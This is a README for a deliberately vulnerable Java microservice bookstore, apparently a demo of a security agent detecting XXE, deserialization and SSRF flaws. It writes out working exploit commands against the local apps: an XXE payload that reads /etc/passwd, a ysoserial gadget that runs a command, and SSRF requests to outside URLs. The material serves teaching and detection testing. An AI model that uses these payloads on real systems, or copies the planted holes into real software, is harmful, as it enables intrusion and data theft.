This repo holds a few Java apps showing the agent's ability to discover the most common vulnerabilities in microservices.
There are 3 microservice apps that implement a "book store".
The bookstore-frontend app is a jax-rs app serving as a front end for the book store, exposing these endpoints for book management:
- GET /health
- POST /add (this endpoint has an XXE vulnerability)
- POST /delete
- GET /list
- GET /debug
The bookstore-data-manager app is a SpringBoot app which holds the book data, offering a few services:
- GET /ping
- POST /add
- POST /update (this "internal only" endpoint has a deserialization vulnerability)
- POST /delete
- GET /list
The bookstore-debug app is a Dropwizard app that offers info to the devs:
- GET /application/ping
- GET /application/info?env=qa (this endpoint has an SSRF vulnerability)
The first step is to start all 3 of the services, which will run on ports 8000, 8001 and 8002, respectively.
To start normally:
$ docker-compose up
To start with Contrast enabled, first edit contrast_security.yaml with your agent credentials, then:
$ cp /path/to/contrast.jar .
$ docker-compose -f docker-compose.yml -f docker-compose-contrast.yml up
If you don't want to use docker-compose, each service has a Dockerfile to make running 1 step. Consult each service's README.md to see the commands.
You're supposed to do everything through the frontend service.
Get a health check on the entire bookstore service mesh:
$ curl http://localhost:8000/health
List all the books:
$ curl http://localhost:8000/list
Add a book:
$ curl -H "Content-Type: application/xml" http://localhost:8000/add -d '<book><title>The Giving Tree</title><pages>30</pages></book>'
Alternatively, you can add a book through the backend service directly, where it expects JSON:
$ curl -H "Content-Type: application/json" http://localhost:8001/add -d '{"pages":"30", "title":"The Giving Tree"}'
Get debug info on the service:
$ curl http://localhost:8000/debug
To detect the vulnerabilities, start the apps with Contrast enabled as described above. Then use the services to exercise the code. It should not be necessary to exploit the vulnerabilities, in order for Contrast to identify the vulnerabilities.
The XXE vulnerability can be exploited directly in the bookstore-frontend by adding a new malicious book:
$ curl -H "Content-Type: application/xml" http://localhost:8000/add -d '<?xml version="1.0"?><!DOCTYPE book [<!ENTITY xxe SYSTEM "/etc/passwd">]><book><title>foo &xxe;</title><pages>21</pages></book>'
Now the contents of /etc/passwd has leaked into the the new book title, which you can see by
checking the book titles:
$ curl http://localhost:8000/list
The bookstore-data-manager offers an "update a book" service that is not supposed to be used from
the outside, which is why it's not available through the bookstore-frontend.
This service is available at /update, and it accepts a binary, serialized Java object with Book
type.
To exploit this, we must first make an exploit that creates a file in /tmp as a proof-of-concept:
$ git clone https://github.com/frohoff/ysoserial
$ cd ysoserial
$ docker build -t ysoserial .
$ docker run --rm ysoserial CommonsCollections5 '/usr/bin/touch /tmp/hacked' > commonscollections5.ser
Now you can send the exploit generated in the commonscollections5.ser file:
$ curl -X POST -H "Content-Type: application/octet-stream" --data-binary "@commonscollections5.ser" http://localhost:8001/update
To prove that we created this /tmp/hacked file, we must shell into the running container.
If you started with docker-compose, the container ID is something like java-microservice-sample-apps_bookstore-datamanager_1.
If you ran the containers manually, you can start with the ID:
$ docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
*[RUNNING_CONTAINER_ID]* bookstore-data-manager "mvn spring-boot:run"
Now, using that container ID, we shell into the container and confirm the exploit created the /tmp/hacked file:
$ docker exec -it java-microservice-sample-apps_bookstore-datamanager_1 ls -al /tmp/hacked
...
-rw-r--r-- 1 root root 0 <time> /tmp/hacked
The bookstore-frontend exposes a "info" service, only intended for developers. It is intended to be used to rertieve data about different developer environments, but it can be used to force the app to retrieve data from other URLs:
$ curl http://localhost:8002/application/info?env=google.com/?
Obviously in this case we ask the server to retrieve Google content, but it could as easily be pointed towards URLs typically only accessed within your perimeter.
$ curl http://localhost:8002/application/info?env=SECRET